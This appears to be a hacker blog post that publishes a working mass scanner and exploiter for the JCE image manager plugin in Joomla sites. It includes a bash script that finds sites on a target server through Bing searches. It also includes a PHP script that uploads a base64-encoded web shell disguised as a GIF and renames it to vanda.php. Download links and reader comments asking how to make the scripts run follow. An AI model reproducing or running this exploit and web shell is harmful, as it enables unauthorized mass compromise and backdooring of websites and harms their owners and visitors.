D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4
insert jce.php beside bash script :
#!/bin/bash
# Jce Server Scanner && Exploiter
# Coded By : Red V!per
# http://redhat-viper.blogspot.com
# Report Bugs : RedH4t.Viper@yahoo.com
# D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4
# Gr33tz : All Turkish && Persian Hacker
#--------------------------------------------------------------------------------------------------------------------
#
# Tnx 2 : IrIsT.Ir && turk-bh.ir && ibh.ir && 3xp1r3.com && madleets.com
# devil-zone.net && kurdhackteam.com && www.turkhackteam.net && thecrowscrew.org
#
#-------------------- Red V!per Banner ----------------------------------------------------------------------------
Banner()
{
clear
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" || || "; tput sgr0
echo -e '\E[34m'" ||\E[31m _____ _ __ ___ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | __ \ | | \ \ / / | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | |__) |___ __| | \ \ / /| |_ __ ___ _ __ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | _ // _ \/ _\ | \ \/ / | | '_ \ / _ \ '__| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \ \ __/ (_| | \ / |_| |_) | __/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_| \_\___|\__,_| \/ (_) .__/ \___|_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m (_) \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _ ___ ___ ___ ___ __ _ _ __ _ __ ___ _ __ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | | (_| __/ \__ \ (_| (_| | | | | | | | __/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m|__/ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
sleep 3
echo
echo -e "$B /\ (^_^) /\ [public] \n"
echo -e " -===============================================-\n"
echo -e " Server Jce Scanner && Exploiter"
echo
echo -e " BY : Red V!per\n"
echo -e " -===============================================-"
echo
echo
echo -e " -========== [ INFO ] ===========-"
echo
read -p "[*] Target Ip : " IP
echo -e "$N"
}
#-------------------- Variables ----------------------------------------------------------------------------
B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"
#-------------------- Scanning Jce Targets on Server -------------------------------------------------------
scan_jce_on_victim()
{
page=0
how_many=1
single_page=
last_page_check=
image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"
while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"
wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url"
last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`
how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`
single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `
cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
rm -f domain_bing.php
let page=$page+1
done
cat alldomain_bing.txt | grep "com_" | tr '[:upper:]' '[:lower:]' | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | cut -d '?' -f 1 | awk '{gsub("/index.php","")}1' | sort | uniq >> domains.txt
for domain in `cat domains.txt`
do
GET -sd "http://www.$domain/$image_manager" | grep "OK" >> /dev/null;check=$?
if [ $check -eq 0 ]
then
echo "www.$domain" > site.lst
php jce.php site.lst shells.lst
GET -s "http://www.$domain/images/stories/vanda.php" | grep "GIF89a1" >> /dev/null;check2=$?
if [ $check2 -eq 0 ]
then
echo -e "$B[+] www.$domain \e[1;32m[Trying to upload shell] \e[0m"
echo -e "$B[+] Shell : www.$domain/images/stories/vanda.php \e[1;31m[OK] \e[0m"
echo "www.$domain/images/stories/vanda.php" >> vanda_shells.lst
else
echo "[-] www.$domain/ [No] "
fi
else
echo "[-] www.$domain/ [No] "
fi
done
rm -rf alldomain_bing.txt
rm -rf domains.txt
rm -rf site.lst
rm -rf shells.lst
}
#-------------------- Remove ------------------------------------------------------------------------
all_remove()
{
rm -rf alldomain_bing*
rm -rf domains_f*
rm -rf domains_f*
rm -rf domain_bing*
rm -rf alldomain_bing*
rm -rf domains*
rm -rf jce_server*
rm -rf site*
}
#-------------------- Main Brain :D ------------------------------------------------------------------------
main()
{
chmod +x jce.php
if [ ! -f shells.lst ]; then
touch shells.lst ;
fi
Banner;
all_remove;
scan_jce_on_victim;
}
main;
jce.php :
<?phpDownload Bash Script :http://www.mediafire.com/view/2rk5ikxu1k1kon3/jce-scanner-exploiter.sh
/*
# Mass Uploader
# Coded By Mua & Keresteci
# Recoded By Red V!per
*/
$kirilmis = 0;
$taranmis = 0;
error_reporting(0);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 3);
function oku($link)
{
$site = parse_url($link);
$link = $site["path"];
$site = $site["host"];
$httpresponse = "";
$fp = fsockopen($site, 80, $err_num, $err_msg, 30);
if ($fp) {
fputs($fp, "GET $link HTTP/1.0\r\nHost: $site\r\n\r\n");
fputs($fp, "Connection: close\n\n");
while (!feof($fp)) {
$http_response .= fgets($fp, 128);
}
fclose($fp);
}
return $http_response;
}
$dosya = $argv[1];
$kirilanlar = fopen($argv[2], 'w');
$okunan = file($dosya);
$toplam = count($okunan);
foreach ($okunan as $sira => $satir) {
$hatalisite = 0;
$satir = preg_replace("/[\\n\\r]+/", "", $satir);
$url = parse_url($satir);
if ($url["scheme"])
$host = $url["host"];
else {
$url = parse_url("http://" . $satir);
$host = $url["host"];
}
$packet = "Mua-Kontrol-Paketi-Panpa";
$fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $packet);
fclose($fp);
}
$content = "GIF89a1\n";
$content .= '<?php eval("?>".base64_decode("PGh0bWw+IENvZGVkIEJ5IE11YSAmIEtlcmVzdGVjaTxicj4NCjw/IA0KLyogQ29kZWQgQnkgTXVhICYgS2VyZXN0ZWNpICovDQplY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOw0KZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7DQppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+dXN0YSB1cGxvYWQgYmFzYXJpbGk8L2I+PGJyPjxicj4nOyB9DQp9DQo/PjwvaHRtbD4=")); ?>';
$data = "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
$data .= "/\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
$data .= "0\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"mua.gif\"\r\n";
$data .= "Content-Type: image/gif\r\n\r\n";
$data .= "$content\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "0day\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
$data .= "upload\r\n";
$data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";
$packet = "POST " . $p . "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
$packet .= "Accept-Language: en-us,en;q=0.5\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Proxy-Connection: close\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n\r\n\r\n\r\n";
$packet .= $data;
$fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $packet);
fclose($fp);
}
$packet = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "User-Agent: Mua \r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-US,en;q=0.8\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
$packet .= "Accept-Encoding: deflate\n";
$packet .= "X-Request: JSON\r\n";
$packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
$ren = "json={\"fn\":\"folderRename\",\"args\":[\"/mua.gif\",\"vanda.php\"]}";
$packet .= "Content-Length: " . strlen($ren) . "\r\n\r\n";
$packet .= $ren . "\r\n\r\n";
$fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $packet);
fclose($fp);
}
$taranmis = $taranmis + 1;
$kod = oku("http://" . $host . "/images/stories/vanda.php");
$pozisyon = strpos($kod, "GIF89a1");
if ($pozisyon == true) {
$kirilmis = $kirilmis + 1;
fwrite($kirilanlar, "http://" . $host . "/images/stories/vanda.php\r\n");
}
} //for each
fclose($yaz);
fclose($kirilanlar);
Download jce.php : http://www.mediafire.com/view/p8210ab5d0duj9y/jce.php
Hi, i try to use you`r scanner but, i get an error, i get the permision to file +x and 777 and still i get the error.
ReplyDelete-sh-3.2$ ./jce-scanner-exploiter.sh
-sh: ./jce-scanner-exploiter.sh: /bin/bash^M: bad interpreter: No such file or directory
can u post here what i need to do?
Thanks
PS: the root have php at last version
bash: ./jce-scanner-exploiter.sh: Permission denied
ReplyDeletehow to overcome?
Hi SK . if u have dos2unix software on your pc run this command
ReplyDeletedos2unix script.sh
if u have not dis software please install it buy this command
sudo apt-get install dos2unix
and Dear Riypto rypto please run script with root acces or run script with sudo
sudo script.sh
then give your root password
why after entering the ip is not running ?
Deletesalam dadash error mide
ReplyDeletehttp://up.vbiran.ir/uploads/aaa_35661138885548143234.png
must .
ReplyDeletechmod 777 jce-scanner-exploiter.sh :))
update The Bing Url In The Script Because Bing Has Made Changes
ReplyDeletesalam >>after entering IP not worke ???? ):
ReplyDelete